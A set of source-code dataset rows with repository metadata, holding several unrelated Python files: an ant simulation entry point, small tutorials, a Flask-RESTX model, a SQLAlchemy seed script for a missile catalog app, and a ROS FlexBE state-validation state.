] | null | null | null | ants.py | doug-letough/ants | feab4ae6857fa21d0f9addaf46fcccd7a20cd940 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python
# -*- coding:Utf-8 -*-
"""The ants module entry point.
"""
import config
import ant
import farm
import mine
import playground
import display
import logging
import random
import utils
__author__ = "Doug Le Tough"
__copyright__ = "Copyright 2017, Doug Le Tough"
__credits__ = ["Doug Le Tough",]
__license__ = "WTFPL"
__version__ = "1.0.0"
__maintainer__ = "Doug Le Tough"
__email__ = "doug.letough@free.fr"
__status__ = "Testing"
###################################################################################################################
# App
###################################################################################################################
if __name__ == '__main__':
# The display
disp = display.Display(config.PLAYGROUND_SIZE, config.FARM_INITIAL_FOOD_STOCK)
# The FIFO queue to communicate with display
display_q = disp.get_display_queue()
# The queue needed to have response back from display to playground
response_q = disp.get_response_queue()
# Create play ground
ground = playground.Playground(config.PLAYGROUND_SIZE, response_q)
# Create a food mine
mine_position = (int(config.FARM_POS[0] + 50), int(config.FARM_POS[1] + 50))
mine = mine.Mine(mine_position, config.MINE_RADIUS)
# Add the mine to the playground
ground.add_mine(mine)
# Display the mine
display_q.put(mine.to_dict())
# Create the farm
farm = farm.Farm(ground,
display_q,
config.FARM_POS,
config.FARM_GROWTH_RATE,
config.FARM_INITIAL_FOOD_STOCK,
config.FARM_SURVIVAL_TIMEOUT,
config.FARM_RADIUS)
# Add farm to the playground
ground.add_farm(farm)
# Display farm
display_q.put(farm.to_dict())
# Start the farm own process
farm.start()
# Start the display own process
disp.start()
| 30.145161 | 115 | 0.607277 | #!/usr/bin/env python
# -*- coding:Utf-8 -*-
"""The ants module entry point.
"""
import config
import ant
import farm
import mine
import playground
import display
import logging
import random
import utils
__author__ = "Doug Le Tough"
__copyright__ = "Copyright 2017, Doug Le Tough"
__credits__ = ["Doug Le Tough",]
__license__ = "WTFPL"
__version__ = "1.0.0"
__maintainer__ = "Doug Le Tough"
__email__ = "doug.letough@free.fr"
__status__ = "Testing"
###################################################################################################################
# App
###################################################################################################################
if __name__ == '__main__':
# The display
disp = display.Display(config.PLAYGROUND_SIZE, config.FARM_INITIAL_FOOD_STOCK)
# The FIFO queue to communicate with display
display_q = disp.get_display_queue()
# The queue needed to have response back from display to playground
response_q = disp.get_response_queue()
# Create play ground
ground = playground.Playground(config.PLAYGROUND_SIZE, response_q)
# Create a food mine
mine_position = (int(config.FARM_POS[0] + 50), int(config.FARM_POS[1] + 50))
mine = mine.Mine(mine_position, config.MINE_RADIUS)
# Add the mine to the playground
ground.add_mine(mine)
# Display the mine
display_q.put(mine.to_dict())
# Create the farm
farm = farm.Farm(ground,
display_q,
config.FARM_POS,
config.FARM_GROWTH_RATE,
config.FARM_INITIAL_FOOD_STOCK,
config.FARM_SURVIVAL_TIMEOUT,
config.FARM_RADIUS)
# Add farm to the playground
ground.add_farm(farm)
# Display farm
display_q.put(farm.to_dict())
# Start the farm own process
farm.start()
# Start the display own process
disp.start()
| 0 | 0 | 0 |
8916d7dddc0388e8fed8401c56cf19605144c021 | 194 | py | Python | exercicios curso em video/ex018.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex018.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex018.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | from math import sin, cos, tan, radians
a = radians(float(input('informe o ângulo: ')))
print(' o seno é: {:.2f}\n o cosseno é: {:.2f}\n a tangente é: {:.2f}'.format(sin(a), cos(a), tan(a)))
| 48.5 | 103 | 0.608247 | from math import sin, cos, tan, radians
a = radians(float(input('informe o ângulo: ')))
print(' o seno é: {:.2f}\n o cosseno é: {:.2f}\n a tangente é: {:.2f}'.format(sin(a), cos(a), tan(a)))
| 0 | 0 | 0 |
420fa1fbc980f7660660c628ae98928c0adf0f74 | 1,464 | py | Python | tutorial/collection.py | luanxiangming/rqsts | 0bd3fa2fe64c71bf5702654de46e953d7a144847 | [
"Apache-2.0"
] | 2 | 2017-04-28T09:54:39.000Z | 2017-05-03T12:38:19.000Z | tutorial/collection.py | luanxiangming/rqsts | 0bd3fa2fe64c71bf5702654de46e953d7a144847 | [
"Apache-2.0"
] | null | null | null | tutorial/collection.py | luanxiangming/rqsts | 0bd3fa2fe64c71bf5702654de46e953d7a144847 | [
"Apache-2.0"
] | null | null | null | from collections import *
def collections_nametuple():
"""
namedtuple是一个函数,它用来创建一个自定义的tuple对象,并且规定了tuple元素的个数,并可以用属性而不是索引来引用tuple的某个元素。
"""
Point = namedtuple('Point', ['x', 'y'])
p = Point(1, 2)
print('p.x: ' + str(p.x))
print('isInstance(p, Point): ' + str(isinstance(p, Point)))
print('isInstance(p, tuple): ' + str(isinstance(p, tuple))) # Point对象是tuple的一种子类
Circle = namedtuple('Circle', ['x', 'y', 'r'])
circle = Circle(2, 2, 1)
print('circle.r: ' + str(circle.r))
def collections_counter():
"""
Counter是一个简单的计数器
实际上是dict的一个子类,结果可以看出,字符'g'、'm'、'r'各出现了两次,其他字符各出现了一次
"""
c = Counter()
for i in 'Programming':
c[i] += 1
print(c)
for i, c in c.most_common(): # most_common这个列表中的每个元素都返回一个元祖,一组有序唯一值
print(i, c)
print('\n')
def collections_defaultdict():
"""
注意默认值是调用函数返回的,而函数在创建defaultdict对象时传入。
"""
dd = defaultdict(lambda: 'N/A')
dd[0] = 1
print(dd[0]) # 存在
print(dd[1]) # 不存在,返回默认值
print(dd[2]) # 不存在,返回默认值
collections_nametuple()
collections_ordereddict()
collections_counter()
collections_defaultdict()
| 21.850746 | 82 | 0.636612 | from collections import *
def collections_nametuple():
"""
namedtuple是一个函数,它用来创建一个自定义的tuple对象,并且规定了tuple元素的个数,并可以用属性而不是索引来引用tuple的某个元素。
"""
Point = namedtuple('Point', ['x', 'y'])
p = Point(1, 2)
print('p.x: ' + str(p.x))
print('isInstance(p, Point): ' + str(isinstance(p, Point)))
print('isInstance(p, tuple): ' + str(isinstance(p, tuple))) # Point对象是tuple的一种子类
Circle = namedtuple('Circle', ['x', 'y', 'r'])
circle = Circle(2, 2, 1)
print('circle.r: ' + str(circle.r))
def collections_ordereddict():
dt = {'a': 1, 'c': 2, 'b': 3}
for k, v in dt.items():
print(k + ': ' + str(v))
print('\n')
# sort by key
od = OrderedDict(sorted(dt.items(), key=lambda t: t[0]))
for x, y in od.items():
print(x + ': ' + str(y))
print('\n')
# sort by value
od = OrderedDict(sorted(dt.items(), key=lambda t: t[1]))
for i, j in od.items():
print(i + ': ' + str(j))
print('\n')
def collections_counter():
"""
Counter是一个简单的计数器
实际上是dict的一个子类,结果可以看出,字符'g'、'm'、'r'各出现了两次,其他字符各出现了一次
"""
c = Counter()
for i in 'Programming':
c[i] += 1
print(c)
for i, c in c.most_common(): # most_common这个列表中的每个元素都返回一个元祖,一组有序唯一值
print(i, c)
print('\n')
def collections_defaultdict():
"""
注意默认值是调用函数返回的,而函数在创建defaultdict对象时传入。
"""
dd = defaultdict(lambda: 'N/A')
dd[0] = 1
print(dd[0]) # 存在
print(dd[1]) # 不存在,返回默认值
print(dd[2]) # 不存在,返回默认值
collections_nametuple()
collections_ordereddict()
collections_counter()
collections_defaultdict()
| 385 | 0 | 23 |
f0abad9215aed2e7afdafcb8b139d6cc861997dd | 1,258 | py | Python | backend/models/competitor.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 5 | 2020-02-02T14:58:15.000Z | 2022-01-07T08:24:37.000Z | backend/models/competitor.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 773 | 2020-01-04T22:54:01.000Z | 2022-03-31T16:07:56.000Z | backend/models/competitor.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 1 | 2021-12-25T14:32:25.000Z | 2021-12-25T14:32:25.000Z | from flask_restx import Model, fields
competitorModel = Model(
"Competitor",
{
"id": fields.Integer(
description="ID of the Competitor",
example=7,
),
"name": fields.String(
description="Name of the Competitor",
required=True,
example="Fred Jones",
),
"ageClass": fields.String(
description="Age Class of the Competitor", example="M16", default=""
),
"club": fields.String(
description="Club of the Competitor", example="INT", default=""
),
"course": fields.String(
description="Course of the Competitor", example="Long", required=True
),
"league": fields.String(
description="League of the Competitor",
example="(not) Sprintelope 2020",
required=True,
),
},
)
competitorMergeModel = Model(
"Competitor Merge",
{
"competitorKeep": fields.Integer(
description="The ID of the Competitor to Keep and Transfer Result To",
example=7,
),
"competitorMerge": fields.Integer(
description="The ID of the Competitior to Delete", example=9
),
},
)
| 28.590909 | 82 | 0.5469 | from flask_restx import Model, fields
competitorModel = Model(
"Competitor",
{
"id": fields.Integer(
description="ID of the Competitor",
example=7,
),
"name": fields.String(
description="Name of the Competitor",
required=True,
example="Fred Jones",
),
"ageClass": fields.String(
description="Age Class of the Competitor", example="M16", default=""
),
"club": fields.String(
description="Club of the Competitor", example="INT", default=""
),
"course": fields.String(
description="Course of the Competitor", example="Long", required=True
),
"league": fields.String(
description="League of the Competitor",
example="(not) Sprintelope 2020",
required=True,
),
},
)
competitorMergeModel = Model(
"Competitor Merge",
{
"competitorKeep": fields.Integer(
description="The ID of the Competitor to Keep and Transfer Result To",
example=7,
),
"competitorMerge": fields.Integer(
description="The ID of the Competitior to Delete", example=9
),
},
)
| 0 | 0 | 0 |
4920c07ffca83a5e8f40fa65e59790c3aa7f4d62 | 74 | py | Python | my_bot/__main__.py | ColinTheShark/async_modular | 9c359a97761e4ff50ee71c809b7af64eedac7053 | [
"MIT"
] | null | null | null | my_bot/__main__.py | ColinTheShark/async_modular | 9c359a97761e4ff50ee71c809b7af64eedac7053 | [
"MIT"
] | null | null | null | my_bot/__main__.py | ColinTheShark/async_modular | 9c359a97761e4ff50ee71c809b7af64eedac7053 | [
"MIT"
] | null | null | null | from .my_bot import My_Bot
if __name__ == "__main__":
My_Bot().run()
| 14.8 | 26 | 0.662162 | from .my_bot import My_Bot
if __name__ == "__main__":
My_Bot().run()
| 0 | 0 | 0 |
e08bca8e8b6a3d18942ada9c30818ad1a8c120ae | 5,861 | py | Python | catalog/lots_of_missiles.py | akshaym91/p5-itemcatalog | 203deca5b43952c0d19f8397d99c54bd903fbec3 | [
"MIT"
] | null | null | null | catalog/lots_of_missiles.py | akshaym91/p5-itemcatalog | 203deca5b43952c0d19f8397d99c54bd903fbec3 | [
"MIT"
] | null | null | null | catalog/lots_of_missiles.py | akshaym91/p5-itemcatalog | 203deca5b43952c0d19f8397d99c54bd903fbec3 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Country, Base, Missile, User
engine = create_engine('sqlite:///lots_of_missiles.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# create a dummy user
user1 = User(name="Akshay Menon", email="makshay@somewhere.com",
picture='http://lorempixel.com/200/200/people/1')
session.add(user1)
session.commit()
user2 = User(name="Sharath Kumar", email="sharath@kumar.com",
picture='http://lorempixel.com/200/200/people/2')
session.add(user2)
session.commit()
user3 = User(name="Mithun Airani", email="mithun@home.com",
picture='http://lorempixel.com/200/200/people/3')
session.add(user3)
session.commit()
# Creating country and its missiles
firstCountry = Country(name="India", user_id=1)
session.add(firstCountry)
session.commit()
missile1 = Missile(name="Akash",
description="Surface to air missile.",
country=firstCountry,
link="https://en.wikipedia.org/wiki/Akash_(missile)",
user_id=1)
session.add(missile1)
session.commit()
missile2 = Missile(name="Nag",
description="Anti tank missile.",
country=firstCountry,
link="https://en.wikipedia.org/wiki/Nag_(missile)",
user_id=2)
session.add(missile2)
session.commit()
missile3 = Missile(name="Amogha Missile",
description="Anti tank missile.(under development)",
link="https://en.wikipedia.org/wiki/Amogha_missile",
country=firstCountry,
user_id=1)
session.add(missile3)
session.commit()
missile4 = Missile(name="Prithvi-I",
description="surface to surface Ballistic Missile",
link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_I",
country=firstCountry,
user_id=3)
session.add(missile4)
session.commit()
missile5 = Missile(name="Prithvi-II",
description="surface to surface Ballistic Missile",
link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_II",
country=firstCountry,
user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="Prithvi-III",
description="surface to surface Ballistic Missile",
link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_III",
country=firstCountry,
user_id=2)
session.add(missile6)
session.commit()
# Second Country and its missiles
secondCountry = Country(name="United Kingdom", user_id=1)
session.add(secondCountry)
session.commit()
missile1 = Missile(name="Bloodhound",
description="Surface to air missile.",
country=secondCountry,
link="https://en.wikipedia.org/wiki/Bristol_Bloodhound",
user_id=3)
session.add(missile1)
session.commit()
missile2 = Missile(name="Blowpipe",
description="Man portable Surface-to-air",
country=secondCountry,
link="https://en.wikipedia.org/wiki/Blowpipe_missile",
user_id=1)
session.add(missile2)
session.commit()
missile3 = Missile(name="Blue Steel",
description="Nuclear Stand Off Bomb",
link="https://en.wikipedia.org/wiki/Blue_Steel_missile",
country=secondCountry,
user_id=2)
session.add(missile3)
session.commit()
missile4 = Missile(name="Fairy Stooge",
description="anti-ship missile",
link="https://en.wikipedia.org/wiki/Fairey_Stooge",
country=secondCountry,
user_id=1)
session.add(missile4)
session.commit()
# Third Country and its missiles.
thirdCountry = Country(name="Russia", user_id=1)
session.add(thirdCountry)
session.commit()
missile5 = Missile(name="RT-21 Temp 2S",
description="mobile intercontinental ballistic missile (SS-16 Sinner)",
link="https://en.wikipedia.org/wiki/RT-21_Temp_2S",
country=thirdCountry,
user_id=3)
session.add(missile5)
session.commit()
missile6 = Missile(name="RT-21M Pioner",
description="mobile medium range ballistic missile (SS-20 Saber)",
link="https://en.wikipedia.org/wiki/RT-21M_Pioner",
country=thirdCountry,
user_id=3)
session.add(missile6)
session.commit()
missile5 = Missile(name="S-300P missille",
description="(SA-10 Grumble/SA-N-6/SA-20 Gargoyle/SA-X-21 Triumf)",
link="https://en.wikipedia.org/wiki/SA-10_Grumble",
country=thirdCountry,
user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="UR-100N",
description=" intercontinental ballistic missile (SS-19 Stiletto)",
link="https://en.wikipedia.org/wiki/UR-100N",
country=thirdCountry,
user_id=1)
session.add(missile6)
session.commit()
session.commit()
| 34.680473 | 90 | 0.628903 | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Country, Base, Missile, User
engine = create_engine('sqlite:///lots_of_missiles.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# create a dummy user
user1 = User(name="Akshay Menon", email="makshay@somewhere.com",
picture='http://lorempixel.com/200/200/people/1')
session.add(user1)
session.commit()
user2 = User(name="Sharath Kumar", email="sharath@kumar.com",
picture='http://lorempixel.com/200/200/people/2')
session.add(user2)
session.commit()
user3 = User(name="Mithun Airani", email="mithun@home.com",
picture='http://lorempixel.com/200/200/people/3')
session.add(user3)
session.commit()
# Creating country and its missiles
firstCountry = Country(name="India", user_id=1)
session.add(firstCountry)
session.commit()
missile1 = Missile(name="Akash",
description="Surface to air missile.",
country=firstCountry,
link="https://en.wikipedia.org/wiki/Akash_(missile)",
user_id=1)
session.add(missile1)
session.commit()
missile2 = Missile(name="Nag",
description="Anti tank missile.",
country=firstCountry,
link="https://en.wikipedia.org/wiki/Nag_(missile)",
user_id=2)
session.add(missile2)
session.commit()
missile3 = Missile(name="Amogha Missile",
description="Anti tank missile.(under development)",
link="https://en.wikipedia.org/wiki/Amogha_missile",
country=firstCountry,
user_id=1)
session.add(missile3)
session.commit()
missile4 = Missile(name="Prithvi-I",
description="surface to surface Ballistic Missile",
link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_I",
country=firstCountry,
user_id=3)
session.add(missile4)
session.commit()
missile5 = Missile(name="Prithvi-II",
description="surface to surface Ballistic Missile",
link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_II",
country=firstCountry,
user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="Prithvi-III",
description="surface to surface Ballistic Missile",
link="https://en.wikipedia.org/wiki/Prithvi_(missile)#Prithvi_III",
country=firstCountry,
user_id=2)
session.add(missile6)
session.commit()
# Second Country and its missiles
secondCountry = Country(name="United Kingdom", user_id=1)
session.add(secondCountry)
session.commit()
missile1 = Missile(name="Bloodhound",
description="Surface to air missile.",
country=secondCountry,
link="https://en.wikipedia.org/wiki/Bristol_Bloodhound",
user_id=3)
session.add(missile1)
session.commit()
missile2 = Missile(name="Blowpipe",
description="Man portable Surface-to-air",
country=secondCountry,
link="https://en.wikipedia.org/wiki/Blowpipe_missile",
user_id=1)
session.add(missile2)
session.commit()
missile3 = Missile(name="Blue Steel",
description="Nuclear Stand Off Bomb",
link="https://en.wikipedia.org/wiki/Blue_Steel_missile",
country=secondCountry,
user_id=2)
session.add(missile3)
session.commit()
missile4 = Missile(name="Fairy Stooge",
description="anti-ship missile",
link="https://en.wikipedia.org/wiki/Fairey_Stooge",
country=secondCountry,
user_id=1)
session.add(missile4)
session.commit()
# Third Country and its missiles.
thirdCountry = Country(name="Russia", user_id=1)
session.add(thirdCountry)
session.commit()
missile5 = Missile(name="RT-21 Temp 2S",
description="mobile intercontinental ballistic missile (SS-16 Sinner)",
link="https://en.wikipedia.org/wiki/RT-21_Temp_2S",
country=thirdCountry,
user_id=3)
session.add(missile5)
session.commit()
missile6 = Missile(name="RT-21M Pioner",
description="mobile medium range ballistic missile (SS-20 Saber)",
link="https://en.wikipedia.org/wiki/RT-21M_Pioner",
country=thirdCountry,
user_id=3)
session.add(missile6)
session.commit()
missile5 = Missile(name="S-300P missille",
description="(SA-10 Grumble/SA-N-6/SA-20 Gargoyle/SA-X-21 Triumf)",
link="https://en.wikipedia.org/wiki/SA-10_Grumble",
country=thirdCountry,
user_id=1)
session.add(missile5)
session.commit()
missile6 = Missile(name="UR-100N",
description=" intercontinental ballistic missile (SS-19 Stiletto)",
link="https://en.wikipedia.org/wiki/UR-100N",
country=thirdCountry,
user_id=1)
session.add(missile6)
session.commit()
session.commit()
| 0 | 0 | 0 |
dde91c0374d34e326519572f04e8b6cb7b12efe1 | 9,455 | py | Python | flexible_manipulation_flexbe_states/src/flexible_manipulation_flexbe_states/state_validation_state.py | ZiwenZhuang/flexible_manipulation | 052a6acf6791ed7a7dea06bf6073d9a52e96ce3e | [
"BSD-3-Clause"
] | 5 | 2019-05-15T07:14:15.000Z | 2020-09-01T06:56:56.000Z | flexible_manipulation_flexbe_states/src/flexible_manipulation_flexbe_states/state_validation_state.py | ZiwenZhuang/flexible_manipulation | 052a6acf6791ed7a7dea06bf6073d9a52e96ce3e | [
"BSD-3-Clause"
] | 2 | 2020-03-24T07:57:04.000Z | 2020-09-02T01:08:01.000Z | flexible_manipulation_flexbe_states/src/flexible_manipulation_flexbe_states/state_validation_state.py | ZiwenZhuang/flexible_manipulation | 052a6acf6791ed7a7dea06bf6073d9a52e96ce3e | [
"BSD-3-Clause"
] | 5 | 2019-04-27T23:25:25.000Z | 2020-09-02T01:08:18.000Z | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from flexbe_core.proxy import ProxyActionClient
from actionlib_msgs.msg import GoalStatus
from flexible_manipulation_msgs.msg import StateValidationAction, StateValidationGoal
from moveit_msgs.msg import Constraints, RobotState, ContactInformation, CostSource, ConstraintEvalResult
from flexible_manipulation_flexbe_states.proxy import ProxyMoveItClient
'''
Created on 05-Mar-2018
@author: David Conner, Julie Gates, and Jenny Gu
'''
class StateValidationState(EventState):
'''
State to validate state using StateValidationAction.
-- timeout double How long to wait for state validation
(default: 5 seconds)
-- wait_duration double How long to wait for action server (seconds) (0.0 waits indefinitely)
-- action_topic string Topic name for the StateValidation action server
(default: None --> Use user data)
-- group_name string Group name for the StateValidation request
(default: None --> Use user data)
># action_topic string Topic name for the StateValidation action server (if None )
># group_name string Name of the group to be used for query
#> status_text string Status text for any errors
<= valid State has been validated.
<= invalid State is not valid given constraints
<= failed State has not been validated.
'''
def __init__(self, timeout=5.0, wait_duration=0.001, action_topic=None, group_name=None):
'''
Constructor
'''
super(StateValidationState, self).__init__(
input_keys=['action_topic','group_name'],
outcomes=['valid', 'invalid', 'failed'],
output_keys=['status_text'] )
self.client = None
self.wait_duration = wait_duration
self.given_action_topic = action_topic
if (self.given_action_topic is not None) and (len(self.given_action_topic) > 0):
# If topic is defined, set the client up on startup
self.client = ProxyActionClient({self.given_action_topic: StateValidationAction},
self.wait_duration)
else:
self.given_action_topic = None # handle empty string
self.current_action_topic = self.given_action_topic
self.group_name = group_name
if (self.group_name is not None and len(self.group_name)==0):
self.group_name = None # handle empty string
# Not doing anything with result values for now
#self.valid = None
#self.contacts = None
#self.cost_sources = None
#self.constraint_result = None
self.moveit_client = None
try:
self.moveit_client = ProxyMoveItClient(None)
except Exception as e:
Logger.logerr(" %s - exception on initialization of ProxyMoveItClient \n%s"% (self.name, str(e)))
self.timeout_duration = rospy.Duration(timeout)
self.return_code = None
self.status_text = None
def execute(self, userdata):
'''
Execute this state
'''
if self.return_code is not None:
# Return any previously assigned return code if we are in pause
userdata.status_text = self.status_text
return self.return_code
if self.client.has_result(self.current_action_topic):
result = self.client.get_result(self.current_action_topic)
if (result.valid):
self.return_code = 'valid'
self.status_text = 'checked robot state is valid'
else:
self.return_code = 'invalid'
self.status_text = 'checked robot state is not valid! number of contacts = %d' % (len(result.contacts))
Logger.loginfo(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.client.get_state(self.current_action_topic) == GoalStatus.ABORTED:
self.status_text = "StateValidation - %s request aborted by state validation action server\n %s" % (self.name, self.action_client.get_goal_status_text(self.current_action_topic))
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.client.get_state(self.current_action_topic) == GoalStatus.REJECTED:
# No result returned is returned for this action, so go by the client state
userdata.valid = self.valid
self.status_text = "StateValidation - %s request rejected by state validation action server" % (self.name, self.action_client.get_goal_status_text(self.current_action_topic))
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.timeout_target is not None and rospy.Time.now() > self.timeout_target:
self.status_text = "StateValidation - timeout waiting for %s to state validation (%f > %f (%f))" % (self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec())
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
#Logger.logwarn("StateValidation - %s (%f > %f (%f))" % (self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec()))
# Normal monitoring
| 43.173516 | 211 | 0.618932 | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from flexbe_core.proxy import ProxyActionClient
from actionlib_msgs.msg import GoalStatus
from flexible_manipulation_msgs.msg import StateValidationAction, StateValidationGoal
from moveit_msgs.msg import Constraints, RobotState, ContactInformation, CostSource, ConstraintEvalResult
from flexible_manipulation_flexbe_states.proxy import ProxyMoveItClient
'''
Created on 05-Mar-2018
@author: David Conner, Julie Gates, and Jenny Gu
'''
class StateValidationState(EventState):
'''
State to validate state using StateValidationAction.
-- timeout double How long to wait for state validation
(default: 5 seconds)
-- wait_duration double How long to wait for action server (seconds) (0.0 waits indefinitely)
-- action_topic string Topic name for the StateValidation action server
(default: None --> Use user data)
-- group_name string Group name for the StateValidation request
(default: None --> Use user data)
># action_topic string Topic name for the StateValidation action server (if None )
># group_name string Name of the group to be used for query
#> status_text string Status text for any errors
<= valid State has been validated.
<= invalid State is not valid given constraints
<= failed State has not been validated.
'''
def __init__(self, timeout=5.0, wait_duration=0.001, action_topic=None, group_name=None):
'''
Constructor
'''
super(StateValidationState, self).__init__(
input_keys=['action_topic','group_name'],
outcomes=['valid', 'invalid', 'failed'],
output_keys=['status_text'] )
self.client = None
self.wait_duration = wait_duration
self.given_action_topic = action_topic
if (self.given_action_topic is not None) and (len(self.given_action_topic) > 0):
# If topic is defined, set the client up on startup
self.client = ProxyActionClient({self.given_action_topic: StateValidationAction},
self.wait_duration)
else:
self.given_action_topic = None # handle empty string
self.current_action_topic = self.given_action_topic
self.group_name = group_name
if (self.group_name is not None and len(self.group_name)==0):
self.group_name = None # handle empty string
# Not doing anything with result values for now
#self.valid = None
#self.contacts = None
#self.cost_sources = None
#self.constraint_result = None
self.moveit_client = None
try:
self.moveit_client = ProxyMoveItClient(None)
except Exception as e:
Logger.logerr(" %s - exception on initialization of ProxyMoveItClient \n%s"% (self.name, str(e)))
self.timeout_duration = rospy.Duration(timeout)
self.return_code = None
self.status_text = None
def execute(self, userdata):
'''
Execute this state
'''
if self.return_code is not None:
# Return any previously assigned return code if we are in pause
userdata.status_text = self.status_text
return self.return_code
if self.client.has_result(self.current_action_topic):
result = self.client.get_result(self.current_action_topic)
if (result.valid):
self.return_code = 'valid'
self.status_text = 'checked robot state is valid'
else:
self.return_code = 'invalid'
self.status_text = 'checked robot state is not valid! number of contacts = %d' % (len(result.contacts))
Logger.loginfo(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.client.get_state(self.current_action_topic) == GoalStatus.ABORTED:
self.status_text = "StateValidation - %s request aborted by state validation action server\n %s" % (self.name, self.action_client.get_goal_status_text(self.current_action_topic))
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.client.get_state(self.current_action_topic) == GoalStatus.REJECTED:
# No result returned is returned for this action, so go by the client state
userdata.valid = self.valid
self.status_text = "StateValidation - %s request rejected by state validation action server" % (self.name, self.action_client.get_goal_status_text(self.current_action_topic))
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.timeout_target is not None and rospy.Time.now() > self.timeout_target:
self.status_text = "StateValidation - timeout waiting for %s to state validation (%f > %f (%f))" % (self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec())
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
#Logger.logwarn("StateValidation - %s (%f > %f (%f))" % (self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec()))
# Normal monitoring
def on_enter(self, userdata):
self.return_code = None
self.status_text = None
# Retrieve the relevant data
group_name = self.group_name
self.current_action_topic = self.given_action_topic
try :
if (self.group_name is None):
group_name = userdata.group_name
if (self.given_action_topic is None):
self.current_action_topic = userdata.action_topic
except Exception as e:
self.status_text = 'Failed to set up the action client for %s - invalid user data parameters\n%s' % (self.current_action_topic, str(e))
self.return_code = 'failed'
Logger.logerr(self.status_text)
return
try:
if (self.client is None):
self.client = ProxyActionClient({self.current_action_topic: StateValidationAction},
self.wait_duration)
if not self.client.is_available(self.current_action_topic):
self.client.setupClient(self.current_action_topic, StateValidationAction, self.wait_duration)
if not self.client.is_available(self.current_action_topic):
self.status_text = 'StateValidationAction client is not available for %s' % (self.current_action_topic)
self.return_code = 'param_error'
Logger.logerr(self.status_text)
return
except Exception as e:
Logger.logwarn('Failed to set up the StateValidationAction client for %s\n%s' % (self.current_action_topic, str(e)))
self.return_code = 'failed'
return
try:
# Action Initialization
action_goal = StateValidationGoal()
action_goal.group_name = group_name
action_goal.robot_state = self.moveit_client.get_robot_state(group_name)
action_goal.constraints = self.moveit_client.get_constraints(group_name)
if (self.timeout_duration > rospy.Duration(0.0)):
self.timeout_target = rospy.Time.now() + self.timeout_duration
else:
self.timeout_target = None
Logger.logwarn('before send goal get state in the StateValidationAction client for %s' % (self.name))
print str(action_goal)
print self.current_action_topic
self.client.send_goal(self.current_action_topic, action_goal)
Logger.logwarn('after send goal in the StateValidationAction client for %s' % (self.name))
except Exception as e:
self.status_text = 'Failed to send action goal for group - %s\n%s' % (self.name, str(e))
self.return_code = 'failed'
Logger.logerr(self.status_text)
return
def on_stop(self):
try:
if ( self.client.is_available(self.current_action_topic) \
and not self.client.has_result(self.current_action_topic) ):
# Cancel any active goals
self.client.cancel(self.current_action_topic)
except Exception as e:
# client already closed
Logger.logwarn('Action client already closed - %s\n%s' % (self.current_action_topic, str(e)))
def on_pause(self):
pass
def on_resume(self, userdata):
# If paused during state execution, then re-send the clear command
self.on_enter(userdata)
| 3,406 | 0 | 108 |
0000c38c9907915220ad701f5b1b867061a657a4 | 1,120 | py | Python | network/Decoder.py | muberraozmen/MrMP | da6bcccbad85a682c848ff4aa1121c773d779e57 | [
"MIT"
] | null | null | null | network/Decoder.py | muberraozmen/MrMP | da6bcccbad85a682c848ff4aa1121c773d779e57 | [
"MIT"
] | null | null | null | network/Decoder.py | muberraozmen/MrMP | da6bcccbad85a682c848ff4aa1121c773d779e57 | [
"MIT"
] | null | null | null | from network.Modules import *
__all__ = ['Decoder']
| 29.473684 | 101 | 0.682143 | from network.Modules import *
